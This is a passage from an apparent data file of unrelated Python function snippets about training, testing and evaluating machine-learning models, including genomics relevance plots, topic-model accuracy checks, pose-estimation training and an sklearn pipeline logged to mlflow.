\"/showcase/\" + prefix + \"_\" + midfix + \"_DEV.html\", auto_open=False) # Includes fig.show()\n\n\t\tfig = go.Figure([go.Bar(x=list(range(0, max_cells)), y=occurrences)])\n\t\tfig.update_layout(\n\t\t\ttitle=go.layout.Title(text=prefix + \" \" + midfix + \" occurrences\", xref=\"paper\", x=0),\n\t\t\txaxis=go.layout.XAxis(title=go.layout.xaxis.Title(text=\"# cells in image\", )),\n\t\t\tyaxis=go.layout.YAxis(title=go.layout.yaxis.Title(text=\"# images with that cell count\", ))\n\t\t)\n\t\tplotly.offline.plot(fig, filename=directory + \"/showcase/\" + prefix + \"_\" + midfix + \"_proportion.html\", auto_open=False) # Includes fig.show()", "def utest_SGD_Test():\n model_fname = \"../work/model\"\n # test binary classification.\n if False:\n #test_fname = \"../work/train.bz2\"\n test_fname = \"../work/rcv1_test.binary.bz2\"\n if True:\n test_fname = \"../work/iris_multi.train\"\n test_logreg(model_fname,test_fname,prob=True,acc=True)\n pass", "def test_machine_learning():", "def test_lrp_svm(self, syn_genomic_data, syn_fm, syn_idx, rep, tmp_path, syn_true_pvalues): \n rep_to_plot = 0\n ttbrs = [0.5, 1,1.5]\n idx = syn_idx[str(rep_to_plot)]\n fig, axes = plt.subplots(len(ttbrs), 5, figsize=[30,15])\n x_3d = syn_fm(\"3d\")[str(rep_to_plot)][:]\n x_2d = syn_fm(\"2d\")[str(rep_to_plot)][:]\n indices_true= [inds_true for inds_true, x in enumerate(syn_true_pvalues[0].flatten()) if x]\n\n for i, ttbr in enumerate(ttbrs):\n print('Using tbrr={}'.format(ttbr))\n labels = generate_syn_phenotypes(tower_to_base_ratio=ttbr, quantity=rep)\n labels_cat = {}\n for key, l in labels.items():\n labels_cat[key] = tensorflow.keras.utils.to_categorical((l+1)/2)\n \n best_params_montaez['n_snps']= x_3d.shape[1]\n \n l_0b=labels_cat[str(rep_to_plot)]\n\n model = create_montaez_dense_model(best_params_montaez)\n y_integers = np.argmax(l_0b[idx.train], axis=1)\n class_weights = class_weight.compute_class_weight('balanced', np.unique(y_integers), y_integers)\n d_class_weights = dict(enumerate(class_weights))\n\n model.fit(x=x_3d[idx.train], y=l_0b[idx.train], validation_data=(x_3d[idx.test], l_0b[idx.test]), epochs=best_params_montaez['epochs'], class_weight=d_class_weights, callbacks=[ ReduceLROnPlateau(monitor='val_loss', factor=best_params_montaez['factor'], patience=best_params_montaez['patience'], mode='min'),],)\n\n model = iutils.keras.graph.model_wo_softmax(model)\n analyzer = innvestigate.analyzer.LRPAlpha1Beta0(model)\n weights = analyzer.analyze(x_3d).sum(0)\n\n top_indices_sorted, filtered_weights = postprocess_weights(weights, top_k, filter_window_size, p_svm, p_pnorm_filter)\n\n complete_pvalues = chi_square(syn_genomic_data[str(rep_to_plot)][:], labels[str(rep_to_plot)])\n \n pvalues_filled_deep = np.ones(n_total_snps)\n pvalues_filled_deep[top_indices_sorted] = complete_pvalues[top_indices_sorted]\n\n # Plot RPVT\n plot_pvalues(complete_pvalues, indices_true, axes[i][0])\n if i==0:\n axes[i][0].set_title('RPVT $-log_{10}$(p-values)', fontsize=22)\n axes[i][0].set_ylabel('$-log_{10}$(p-value)', fontsize=18)\n plt.setp(axes[i][0].get_yticklabels(), fontsize=16)\n plt.setp(axes[i][0].get_xticklabels(), fontsize=16)\n\n # Plot svm weights \n clf = LinearSVC(penalty='l2', loss='hinge', C=0.0022, dual=True, tol=1e-3, verbose=0, class_weight='balanced')\n idx_now, pvalues, raw_weights = combi_method(clf, syn_genomic_data[str(rep_to_plot)][:],x_2d, labels[str(rep_to_plot)], 35, 2, 2, 30)\n #filtered_svm_weights = postprocess_weights_without_avg(raw_weights, p_svm)\n pvalues_filled_combi = np.ones(len(complete_pvalues))\n pvalues_filled_combi[idx_now] = pvalues\n #svm_weights = toy_classifier.fit(x_2d, labels[str(rep_to_plot)]).coef_\n axes[i][1].scatter(range(len(np.absolute(raw_weights).sum(1))), 1000*np.absolute(raw_weights).sum(1), marker='.', color='darkblue')\n axes[i][1].scatter(indices_true,1000*np.absolute(raw_weights).sum(1)[indices_true], color='fuchsia')\n axes[i][1].set_ylim(0,1000*(np.max(np.absolute(raw_weights).sum(1))+0.001))\n if i==0:\n axes[i][1].set_title('Absolute SVM weights * 1000', fontsize=22)\n plt.setp(axes[i][1].get_yticklabels(), fontsize=16)\n plt.setp(axes[i][1].get_xticklabels(), fontsize=16)\n\t\t\t\n # Plot COMBI\n plot_pvalues(pvalues_filled_combi, indices_true, axes[i][2])\n if i==0:\n axes[i][2].set_title('COMBI $-log_{10}$(p-values)', fontsize=22)\n if i==2:\n axes[i][2].set_xlabel('SNP position', fontsize=18)\n plt.setp(axes[i][2].get_yticklabels(), fontsize=16)\n plt.setp(axes[i][2].get_xticklabels(), fontsize=16)\n\t\t\t\n # Plot LRP relevance scores\n axes[i][3].scatter(range(len(np.absolute(weights).reshape(-1, 3).sum(1))), np.absolute(weights).reshape(-1, 3).sum(1), marker='.', color='darkblue')\n axes[i][3].scatter(indices_true,np.absolute(weights).reshape(-1, 3).sum(1)[indices_true], color='fuchsia')\n #axes[i][1].legend()\n axes[i][3].set_ylim(0,np.max(np.absolute(weights).reshape(-1, 3).sum(1))+1)\n if i==0:\n axes[i][3].set_title('LRP relevance scores', fontsize=22)\n plt.setp(axes[i][3].get_yticklabels(), fontsize=16)\n plt.setp(axes[i][3].get_xticklabels(), fontsize=16)\n\t\t\t\n # Plot DeepCOMBI\n plot_pvalues(pvalues_filled_deep, indices_true, axes[i][4])\n if i==0:\n axes[i][4].set_title('DeepCOMBI $-log_{10}$(p-value)', fontsize=22)\n plt.setp(axes[i][4].get_yticklabels(), fontsize=16)\n plt.setp(axes[i][4].get_xticklabels(), fontsize=16)\n\t\t\t\n ## Plot distribution of postprocessed vectors\n #axes[i][2].plot(postprocessed_weights)\n #axes[i][2].set_title('Postprocessed relevance')\n\n fig.savefig(os.path.join(IMG_DIR, 'manhattan-example-toy-NAR.png'), bbox_inches='tight')", "def test_model(docs, labels,model, log_writer:LogWriter,test_name):\n stats = []\n topic_indexes, topics_of_index = connect_topic_id_to_topics(model,prep_docs_for_assesment(docs,labels),log_writer)\n distribution = []\n for index, article in enumerate(docs):\n analysis_res = model.analyse_text(article)\n if len(analysis_res) == 0:\n print(\"nothing found\")\n continue\n res = max(analysis_res, key=lambda item: item[1])\n if res[0] not in topics_of_index:\n topics_of_index[res[0]] = [labels[index]]\n topic_indexes[labels[index]] = res[0]\n print(\"continuing\")\n continue\n distribution.append(res[0])\n stats.append(1 if labels[index] in topics_of_index[res[0]] else 0)\n # self.log_writer.add_log(\"Article with topic {} was assigned {} with {} certainty.\".format(article[0], \"correctly\" if res[0] == self.topic_positions[article[0]] else \"wrong\", res[1]))\n accuracy = sum(stats) / len(stats)\n log_writer.add_log(\"{} got accuracy {}\".format(test_name,accuracy))\n log_writer.add_log(\"Real distribution was {}\".format(dict(Counter(labels))))\n log_writer.add_log(\"Predicted distribution was {}\".format(dict(Counter(distribution))))\n return accuracy", "def test_bpe_lstm(self, resource_loader):\n config = {\n \"model_type\": \"tagger\",\n \"example_type\": ENTITY_EXAMPLE_TYPE,\n \"label_type\": ENTITIES_LABEL_TYPE,\n \"model_settings\": {\"classifier_type\": \"lstm-pytorch\"},\n \"params\": { # default token_spans_pooling_type is \"first\"\n \"emb_dim\": 30, \"tokenizer_type\": \"bpe-tokenizer\", \"add_terminals\": True\n },\n }\n examples = self.labeled_data.queries()\n labels = self.labeled_data.entities()\n\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"use_crf_layer\": False}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"token_spans_pooling_type\": \"mean\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"token_spans_pooling_type\": \"max\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"token_spans_pooling_type\": \"mean_sqrt\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {**config[\"params\"], \"token_spans_pooling_type\": \"last\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)\n\n config = {**config, \"params\": {\n **config[\"params\"], \"use_crf_layer\": False, \"token_spans_pooling_type\": \"first\"}}\n model = ModelFactory.create_model_from_config(ModelConfig(**config))\n model.initialize_resources(resource_loader, examples, labels)\n model.fit(examples, labels)\n model_predictions_assertions(model)", "def run_experiment(model, loss, loss_weights, optimizer = keras.optimizers.Adam,\n learning_rate = 0.1, num_epochs = 1, train_dataset:list = None,\n test_dataset:list = None, verbose = 1, log = False):\n train_data = deepcopy(train_dataset)\n test_data = deepcopy(test_dataset)\n\n # should check if data is in dataframes\n try:\n train_data[0] = train_data[0].to_numpy()\n test_data[0] = test_data[0].to_numpy()\n train_data[1] = {k:np.array(v) for k, v in train_data[1].to_dict('list').items()}\n test_data[1] = {k:np.array(v) for k, v in test_data[1].to_dict('list').items()}\n except:\n pass\n\n if log:\n logdir=\"surrogate_models/.logs/\"+ model.name +'_'+ datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_callback = keras.callbacks.TensorBoard(log_dir=logdir)\n\n model.compile(\n optimizer = optimizer(learning_rate=learning_rate),\n loss = loss,\n loss_weights = loss_weights,\n metrics = ['mse'],\n )\n\n print(\"Start training the model {} ...\".format(model.name))\n\n history = model.fit(x = train_data[0], y = train_data[1], epochs=num_epochs,\n validation_data=tuple(test_data), callbacks=[tensorboard_callback],\n verbose = verbose) if log else model.fit(x = train_data[0], y = train_data[1],\n epochs=num_epochs, validation_data=tuple(test_data), verbose = verbose)\n print(\"Evaluating model performance...\")\n\n train_hat = model(train_data[0])\n test_hat = model(test_data[0])\n\n rmse = multi_mse(train_dataset[1], train_hat)\n print(f\"Train MSE: {round(np.sum(rmse)*100, 3)}\")\n\n rmse = multi_mse(test_dataset[1], test_hat)\n print(f\"Test MSE: {round(np.sum(rmse)*100, 3)}\")\n return history", "def run_models(request):\n job_form_data = request.session['job_form_data']\n job_wrapper = JobWrapper(job_form_data)\n job_wrapper.create_data_file()\n print job_wrapper.job_form_data\n # Must run emits to generate emis_co2.dat - this step is requried to\n # run the models and it's a lot simpler to have it run form here than\n # from a job manager script\n cmd = \"/var/opt/IMOGEN/EMITS/emits\"\n subprocess.call(cmd, shell=True)\n print \"Ran {0} program\".format(cmd)\n # Now submit the models via the job manager\n jr = DRMAAJobRunner()\n return jr.queue_job(job_wrapper)", "def __train__(self):\n if (self.type_camf == 'CAMF_CI'):\n #users, items, context, ratings\n ci = camf_ci.CI_class(self.__users_array__, self.__items_array__, self.__context_array__, self.__ratings__, self.fold, self.lr, self.factors)\n predictions, losses = ci.fit()\n elif (self.type_camf == 'CAMF_CU'):\n cu = camf_cu.CU_class(self.__users_array__, self.__items_array__, self.__context_array__, self.__ratings__, self.fold, self.lr, self.factors)\n predictions, losses = cu.fit()\n elif (self.type_camf == 'CAMF_C'):\n c = camf_c.C_class(self.__users_array__, self.__items_array__, self.__context_array__, self.__ratings__, self.fold, self.lr, self.factors)\n predictions, losses = c.fit()\n\n dummy_pred = np.zeros((predictions.shape))\n for r, pred_array in enumerate(predictions):\n for c, pred in enumerate(pred_array):\n dummy_pred[r][c] = self.__check_ratings__(pred)\n predictions = dummy_pred\n #save a plot with a loss function\n plots = prs.PlotRSData()\n #print(losses)\n plots.plot_loss_cars(losses, self.type_camf, self.__save_prefix__+\"_loop\"+str(self.loop))\n pd.DataFrame(losses).to_csv(\"./RecSys/out/CAMF/train/\"+self.type_camf+\"/\" + self.__save_prefix__ +\"losses_loop\"+str(self.loop)+\".csv\")\n print('Saving the feature matrix...')\n # set predictions back to the pivot table\n self.__utility_saved_training__(predictions) \n # save results\n self.utility_predictions.to_csv(\"./RecSys/out/CAMF/train/\"+self.type_camf+\"/\" + self.__save_prefix__ + \"_SGD_predictions_loop\"+str(self.loop)+\".csv\")", "def test_fer_model(img_folder, model=\"/path/to/model\"):\n preds = None\n ### Start your code here\n\n if not os.path.exists(model):\n print (\"Model Loading Error: can't find the model.\\n\")\n return None\n\n if not os.path.exists(img_folder):\n print (\"Data Loading Error: can't find the data.\\n\")\n return None\n\n with open(model, 'rb') as model_file:\n model = load(model_file)\n data = load_FER2013_samples(img_folder)\n preds = model.predict(data)\n print (preds)\n ### End of code\n return preds", "def test_model(self, batch_size):\n (_, gen_val, gen_test) = self.dataset.data_loaders(\n batch_size=batch_size,\n split=(0.01, 0.01)\n )\n print('Num Test Batches: ', len(gen_test))\n mean_loss_test, mean_accuracy_test = self.loss_and_acc_test(gen_test)\n print('Test Epoch:')\n print(\n '\\tTest Loss: ', mean_loss_test, '\\n'\n '\\tTest Accuracy: ', mean_accuracy_test * 100\n )", "def process_models(self, models):\n for model in models:\n # already recording it, ignore\n if self.is_recording(model) is True:\n continue\n self.logger.info(\"Model \" + model + \" is chaturbating\")\n info = self.get_model_info(model)\n # if the embed info was scrapped\n if len(info) > 0:\n # check if the show is private\n if self.is_private(info) is False:\n self.capture(info)\n else:\n self.logger.warning(\"But the show is private\")", "def test_predict(self):\n\t\tMY_TEST_MODEL = \"v1_rm500\"\n\t\tx_test = np.genfromtxt(\"tests/data/ensg_input.txt\",delimiter=\"\\t\")\n\t\tquery_localdirs = cancerscope.get_models.findmodel(os.path.dirname(cancerscope.__file__),MY_TEST_MODEL)\n\t\tif query_localdirs is not None:\n\t\t\tmodel_in = query_localdirs[MY_TEST_MODEL]\n\t\telse:\n\t\t\tmodel_in = cancerscope.get_models.downloadmodel(model_label=MY_TEST_MODEL)\n\t\t\n\t\t\"\"\"Compare results with what you get from 'getmodel()'\"\"\"\n\t\tmodeldir_v1_rm500 = cancerscope.get_models.getmodel(model_label = MY_TEST_MODEL)\n\t\tself.assertEqual(modeldir_v1_rm500[MY_TEST_MODEL][MY_TEST_MODEL], model_in)\n\t\t\n\t\t\"\"\"Test prediction\"\"\"\n\t\tlmodel = cancerscope.scopemodel(model_in)\n\t\tlmodel.fit()\n\t\trandom_sample = np.nan_to_num(x_test[0:17688, 1].reshape(1,17688))\n\t\tpred_testX = lmodel.predict(random_sample)[0][0][0]\n\t\tself.assertEqual(pred_testX, \"ESCA_TS\")\n\t\t\n\t\tallpreds_testX = lmodel.predict(random_sample, get_all_predictions=True, get_numeric=False,get_predictions_dict=False)[0]\n\t\tallpredsNumeric_testX = lmodel.predict(random_sample, get_all_predictions=True, get_numeric=True, get_predictions_dict=False)[0]\n\t\t\n\t\tself.assertEqual(len(allpreds_testX), 66)\n\t\tself.assertEqual(len(allpredsNumeric_testX), 66)\n\t\tself.assertEqual(allpreds_testX[0], \"BRCA_TS\")\n\t\tself.assertTrue(isinstance(allpredsNumeric_testX[0], Number))\n\t\t\n\t\t\"\"\"Test if normalization works and is evaluated to correct floatpoint\"\"\"\n\t\tnormalized_testX = lmodel.get_normalized_input(random_sample)[0]\n\t\tself.assertEqual(normalized_testX[0],0.60640558591378269)\t\n\t\t\n\t\t\"\"\"Test if Jacobian is evaluated correctly\"\"\"\n\t\t#Mar19 keras noncompat#jacobian_test = lmodel.get_jacobian(random_sample)\n\t\t#class0_highestjacobian = np.amax(jacobian_test[0,:])\n\t\t#self.assertEqual(jacobian_test.shape[0], 66) ## Num rows = classes\n\t\t#self.assertEqual(jacobian_test.shape[1], 17688) ## Num columns = genes\n\t\t#self.assertAlmostEqual(class0_highestjacobian, 0.00012377805544766)\n\t\t#END OF #Mar19 keras noncompat#", "def train():\n\n # Load camera parameters\n rcams = cameras.load_cameras()\n\n # Load 3d data and 2d projections\n full_train_set_3d, full_test_set_3d, data_mean_3d, data_std_3d, dim_to_ignore_3d, dim_to_use_3d =\\\n data_utils.read_3d_data( FLAGS.camera_frame, rcams, FLAGS.origin_bc, FLAGS.augment_data,\n FLAGS.procrustes, FLAGS.lowpass )\n \n # Read stacked hourglass 2D predictions\n full_train_set_2d, full_test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = \\\n data_utils.read_2d_predictions( FLAGS.origin_bc, FLAGS.augment_data )\n \n print(\"\\n[+] done reading and normalizing data\")\n # Getting the number of training and test subjects\n tr_subj = 0\n for v in full_train_set_3d.values():\n tr_subj += v.shape[0]\n te_subj = 0\n for v in full_test_set_3d.values():\n te_subj += v.shape[0]\n print(\"{0} training subjects, {1} test subjects\".format(tr_subj, te_subj))\n print(dim_to_use_2d)\n print(dim_to_use_3d)\n # Un-normalizing data for visualizations\n unNorm_ftrs2d = data_utils.unNormalize_dic(full_train_set_2d, data_mean_2d, data_std_2d, dim_to_use_2d)\n unNorm_ftrs3d = data_utils.unNormalize_dic(full_train_set_3d, data_mean_3d, data_std_3d, dim_to_use_3d)\n unNorm_ftes3d = data_utils.unNormalize_dic(full_test_set_3d, data_mean_3d, data_std_3d, dim_to_use_3d)\n # Visualize the data\n viz.visualize_train_sample(unNorm_ftrs2d, unNorm_ftrs3d, FLAGS.camera_frame)\n viz.visualize_files_oneatatime(unNorm_ftrs3d, unNorm_ftes3d)\n\n # Getting only the dimensions to use (get rid of body coxas, other limb, antennas, abdomen\n train_set_3d, train_set_2d, test_set_3d, test_set_2d = {}, {}, {}, {}\n for k in full_train_set_3d:\n (f, c) = k\n train_set_3d[k] = full_train_set_3d[k][:, dim_to_use_3d]\n train_set_2d[(f, data_utils.CAMERA_TO_USE)] =\\\n full_train_set_2d[(f, data_utils.CAMERA_TO_USE)][:, dim_to_use_2d]\n for k in full_test_set_3d:\n (f, c) = k\n test_set_3d[k] = full_test_set_3d[k][:, dim_to_use_3d]\n test_set_2d[(f, data_utils.CAMERA_TO_USE)] =\\\n full_test_set_2d[(f, data_utils.CAMERA_TO_USE)][:, dim_to_use_2d]\n \n print(\"3D data mean:\")\n print(data_mean_3d)\n print(\"3D data std:\")\n print(data_std_3d)\n\n print(\"2D data mean:\")\n print(data_mean_2d)\n print(\"2D data std:\")\n print(data_std_2d)\n \n input(\"Press Enter to continue...\")\n\n # Avoid using the GPU if requested\n device_count = {\"GPU\": 0} if FLAGS.use_cpu else {\"GPU\": 1}\n with tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(\n device_count=device_count,\n allow_soft_placement=True )) as sess:\n\n # === Create the model ===\n print(\"[*] creating %d bi-layers of %d units.\" % (FLAGS.num_layers, FLAGS.linear_size))\n model = create_model( sess, FLAGS.batch_size )\n model.train_writer.add_graph( sess.graph )\n print(\"[+] model created\")\n \n #=== This is the training loop ===\n step_time, loss, val_loss = 0.0, 0.0, 0.0\n current_step = 0 if FLAGS.load <= 0 else FLAGS.load + 1\n previous_losses = []\n\n step_time, loss = 0, 0\n current_epoch = 0\n log_every_n_batches = 100\n losses, errors, joint_errors = [], [], []\n for _ in range( FLAGS.epochs ):\n current_epoch = current_epoch + 1\n\n # === Load training batches for one epoch ===\n encoder_inputs, decoder_outputs =\\\n model.get_all_batches( train_set_2d, train_set_3d, FLAGS.camera_frame, training=True )\n nbatches = len( encoder_inputs )\n print(\"[*] there are {0} train batches\".format( nbatches ))\n start_time, loss = time.time(), 0.\n # === Loop through all the training batches ===\n for i in range( nbatches ):\n\n if (i+1) % log_every_n_batches == 0:\n # Print progress every log_every_n_batches batches\n print(\"Working on epoch {0}, batch {1} / {2}...\".format( current_epoch, i+1, nbatches),end=\"\" )\n\n enc_in, dec_out = encoder_inputs[i], decoder_outputs[i]\n step_loss, loss_summary, lr_summary, _ =\\\n model.step( sess, enc_in, dec_out, FLAGS.dropout, isTraining=True )\n\n if (i+1) % log_every_n_batches == 0:\n # Log and print progress every log_every_n_batches batchespixels = pixels / pixels[2,:]\n model.train_writer.add_summary( loss_summary, current_step )\n model.train_writer.add_summary( lr_summary, current_step )\n step_time = (time.time() - start_time)\n start_time = time.time()\n print(\"done in {0:.2f} ms\".format( 1000*step_time / log_every_n_batches ) )\n\n loss += step_loss\n current_step += 1\n # === end looping through training batches ===\n\n loss = loss / nbatches\n losses.append(loss)\n print(\"=============================\\n\"\n \"Global step: %d\\n\"\n \"Learning rate: %.2e\\n\"\n \"Train loss avg: %.4f\\n\"\n \"=============================\" % (model.global_step.eval(),\n model.learning_rate.eval(), loss) )\n # === End training for an epoch ===\n\n # === Testing after this epoch ===\n isTraining = False\n \n n_joints = len(data_utils.DIMENSIONS_TO_USE)\n if FLAGS.origin_bc:\n n_joints -= len(data_utils.ROOT_POSITIONS)\n\n encoder_inputs, decoder_outputs =\\\n model.get_all_batches( test_set_2d, test_set_3d, FLAGS.camera_frame, training=False)\n\n total_err, coordwise_err, joint_err, step_time, loss = evaluate_batches( sess, model,\n data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,\n data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,\n current_step, encoder_inputs, decoder_outputs, current_epoch )\n\n print(\"=============================\\n\"\n \"Step-time (ms): %.4f\\n\"\n \"Val loss avg: %.4f\\n\"\n \"Val error avg (mm): %.2f (%.2f, %.2f, %.2f)\\n\"\n \"=============================\" % ( 1000*step_time, loss, total_err,\n coordwise_err[0], coordwise_err[1], coordwise_err[2] ))\n\n for i in range(n_joints):\n # 6 spaces, right-aligned, 5 decimal places\n print(\"Error in joint {0:02d} (mm): {1:>5.2f}\".format(i+1, joint_err[i]))\n print(\"=============================\")\n errors.append(coordwise_err)\n joint_errors.append(joint_err)\n # Log the error to tensorboard\n summaries = sess.run( model.err_mm_summary, {model.err_mm: total_err} )\n model.test_writer.add_summary( summaries, current_step )\n\n # Save the model\n print( \"Saving the model... \", end=\"\" )\n start_time = time.time()\n model.saver.save(sess, os.path.join(train_dir, 'checkpoint'), global_step=current_step )\n print( \"done in {0:.2f} ms\".format(1000*(time.time() - start_time)) )\n\n # Reset global time and loss\n step_time, loss = 0, 0\n\n sys.stdout.flush()\n # Save losses for future plots\n def print_list_tofile(l, filename):\n with open(filename, 'wb') as f:\n pickle.dump(l, f)\n print_list_tofile(losses, train_dir+\"/losses.pkl\")\n print_list_tofile(errors, train_dir+\"/errors.pkl\")\n print_list_tofile(joint_errors, train_dir+\"/joint_errors.pkl\")", "def main(domain):\n\n filepath_train1 = '../../Non_covid_data_15oct/train_data_batch1_disregard_removed.pkl'\n filepath_test1 = '../../Non_covid_data_15oct/test_data_batch1_disregard_removed.pkl'\n filepath_train2 = '../../Covid_data_11nov/traindata_covidbatch.pkl'\n filepath_test2 = '../../Covid_data_11nov/testdata_covidbatch.pkl'\n\n df_train_nc, df_test_nc = createDataframe(filepath_train1, filepath_test1, domain, 'noncovid')\n df_train_c, df_test_c = createDataframe(filepath_train2, filepath_test2, domain, 'covid')\n #print(df_train)\n sen_reps_tr_nc, labels_tr_nc, sen_reps_te_nc, labels_te_nc = prepro(df_train_nc, df_test_nc)\n sen_reps_tr_c, labels_tr_c, sen_reps_te_c, labels_te_c = prepro(df_train_c, df_test_c)\n #print(labels_te)\n\n #Uncomment to combine training datasets \n #sen_reps_tr_c += sen_reps_tr_nc\n #labels_tr_c += labels_tr_nc\n\n #Uncomment to combine test datasets and test labels if necessary (if you do so, also combine test df's)\n #sen_reps_te_c += sen_reps_te_nc\n #labels_te_c += labels_te_nc\n #df_test = pd.concat([df_test_c, df_test_nc])\n\n #Feed selected train and test data to regression model\n predictions = get_predictions(sen_reps_tr_c, labels_tr_c, sen_reps_te_c)\n\n #Make dataframes of note id's and labels\n df_ann = make_note_df(df_test_c, labels_te_c)\n df_pred = make_note_df(df_test_c, predictions)\n\n #Evaluate on sentence level\n MSE, MAE, RMSE = evaluation(labels_te_c, predictions)\n\n print(\"MSE \"+domain, MSE)\n print(\"MAE \"+domain, MAE)\n print(\"RMSE \"+domain, RMSE)\n\n #Aggregate per note\n means_ann = means(df_ann)\n means_pred = means(df_pred)\n\n #Evaluate on note level\n MSE, MAE, RMSE = evaluation(means_ann, means_pred)\n\n print(\"MSE agg\"+domain, MSE)\n print(\"MAE agg\"+domain, MAE)\n print(\"RMSE agg\"+domain, RMSE)", "def test_infer_framework(self):\n\t\t\n\t\tprint(f\"test_infer_framework self.model={self.model}\")\n\t\t\n\t\tnum_files = len(glob.glob(f\"{self.model}/*\"))\n\t\tprint(f\"test_infer_framework found {num_files} tmp files\")\n\t\tself.assertTrue(num_files > 0)\n\t\t\n\t\t\n\t\tnum_pytorch_bin_files = len(glob.glob(f\"{self.model}/*bin\"))\n\t\t#print(f\"test_infer_framework found {num_pytorch_bin_files} tmp pytorch bin files\")\n\t\tself.assertEqual(num_pytorch_bin_files, 0)\n\t\t\n\t\tnum_safetensors_files = len(glob.glob(f\"{self.model}/*safetensors\"))\n\t\t#print(f\"test_infer_framework found {num_pytorch_bin_files} tmp num_safetensors_files files\")\n\t\tself.assertEqual(num_safetensors_files, 1)\n\t\t\n\t\tnum_flat_files = len(glob.glob(f\"{self.model}/*npy\"))\n\t\t#print(f\"test_infer_framework found {num_files} tmp npy flat files\")\n\t\tself.assertEqual(num_flat_files, 0)\n\t\t\n\t\texpected_format, expected_fileglob = ww.WeightWatcher.infer_model_file_format(self.model)\n\t\tprint(f\"infer_model_file_format found {expected_format} expected format\")\n\t\tself.assertEqual(expected_format, MODEL_FILE_FORMATS.SAFETENSORS)\t\t\n\n\t\texpected_framework = ww.WeightWatcher.infer_framework(self.model)\n\t\tprint(f\"infer_model_file_format found {expected_framework} expected_framework \")\n\t\tself.assertEqual(expected_framework, FRAMEWORK.PYSTATEDICT_DIR)\t\n\t\t\n\t\treturn", "def run_tests():\r\n source1 = TextModel('50 Shades of Gray')\r\n source1.add_file('50.txt')\r\n \r\n print()\r\n \r\n source2 = TextModel('King James Version of the Bible')\r\n source2.add_file('kjv.txt')\r\n\r\n print()\r\n\r\n new1 = TextModel('Shakespeare')\r\n new1.add_file('shake.txt')\r\n new1.classify(source1, source2)\r\n \r\n print()\r\n \r\n new2 = TextModel('JK Rowling')\r\n new2.add_file('hp.txt')\r\n new2.classify(source1, source2)\r\n \r\n print()\r\n \r\n new3 = TextModel('Breitbart News Network')\r\n new3.add_file('bnn.txt')\r\n new3.classify(source1, source2)\r\n \r\n print()\r\n \r\n new4 = TextModel('Chaucer')\r\n new4.add_file('tct.txt')\r\n new4.classify(source1, source2)", "def test_models_multiclass(model):\n atom = ATOMClassifier(X_class2, y_class2, test_size=0.24, random_state=1)\n atom.run(\n models=model,\n metric=\"f1_micro\",\n n_calls=2,\n n_initial_points=1,\n bo_params={\"base_estimator\": \"rf\", \"cv\": 1},\n )\n assert not atom.errors\n assert hasattr(atom, model)", "def test_model():\n pass", "def train_model(\r\n train_x: pd.DataFrame,\r\n train_y: pd.DataFrame,\r\n parameters: Dict[str, Any]\r\n) -> sklearn_Pipeline:\r\n # Build a multi-class logistic regression model\r\n model_params = parameters['model_params']\r\n model = LogisticRegression(**model_params)\r\n\r\n if parameters['model_standard_scaler']:\r\n # Prepare column transformer to do scaling\r\n col_transformer = ColumnTransformer(\r\n [\r\n (\r\n 'standard_scaler',\r\n StandardScaler(copy=False),\r\n [\r\n \"sepal_length\",\r\n \"sepal_width\",\r\n \"petal_length\",\r\n \"petal_width\",\r\n ],\r\n ),\r\n ],\r\n remainder='drop',\r\n )\r\n\r\n # Make pipeline w/ scaler\r\n model_pipeline = sklearn_Pipeline(\r\n steps=[\r\n ('col_transformer', col_transformer),\r\n ('model', model),\r\n ]\r\n )\r\n else:\r\n # Make pipeline w/o scaler\r\n model_pipeline = sklearn_Pipeline(\r\n steps=[\r\n ('model', model),\r\n ]\r\n )\r\n\r\n # Fit\r\n model_pipeline.fit(train_x, train_y)\r\n\r\n mlflow.set_experiment('iris-example')\r\n mlflow_sklearn.log_model(sk_model=model_pipeline, artifact_path=\"model\")\r\n mlflow.log_params(model_params)\r\n\r\n # Print out the model pipeline\r\n # See: http://www.xavierdupre.fr/app/mlinsights/helpsphinx/notebooks/visualize_pipeline.html\r\n dot = pipeline2dot(model_pipeline, train_x)\r\n dot_filename = 'pipeline_dot.dot'\r\n with open(dot_filename, 'w', encoding='utf-8') as f:\r\n f.write(dot)\r\n if sys.platform.startswith(\"win\") and \"Graphviz\" not in os.environ[\"PATH\"]:\r\n os.environ['PATH'] = os.environ['PATH'] + r';C:\\Program Files (x86)\\Graphviz2.38\\bin'\r\n cmd = \"dot -G=300 -Tpng {0} -o{0}.png\".format(dot_filename)\r\n run_cmd(cmd, wait=True, fLOG=print)\r\n mlflow.log_artifact('{0}.png'.format(dot_filename), 'model')\r\n\r\n return model_pipeline", "def test_model_processor():\n global model_processor_called\n\n model_str = 'first 34 45 7 A 45 65 B true C \"dfdf\"'\n\n metamodel = metamodel_from_str(grammar)\n metamodel.register_model_processor(model_processor)\n\n metamodel.model_from_str(model_str)\n\n assert model_processor_called", "def run(self, df: pd.DataFrame, model: Any):\n print(f'Running cross validation with the following model:\\n{model}')\n\n df['timestamp'] = pd.to_datetime(df['timestamp'])\n\n date_1 = datetime.datetime(year=2016, month=1, day=1)\n date_2 = datetime.datetime(year=2016, month=4, day=1)\n date_3 = 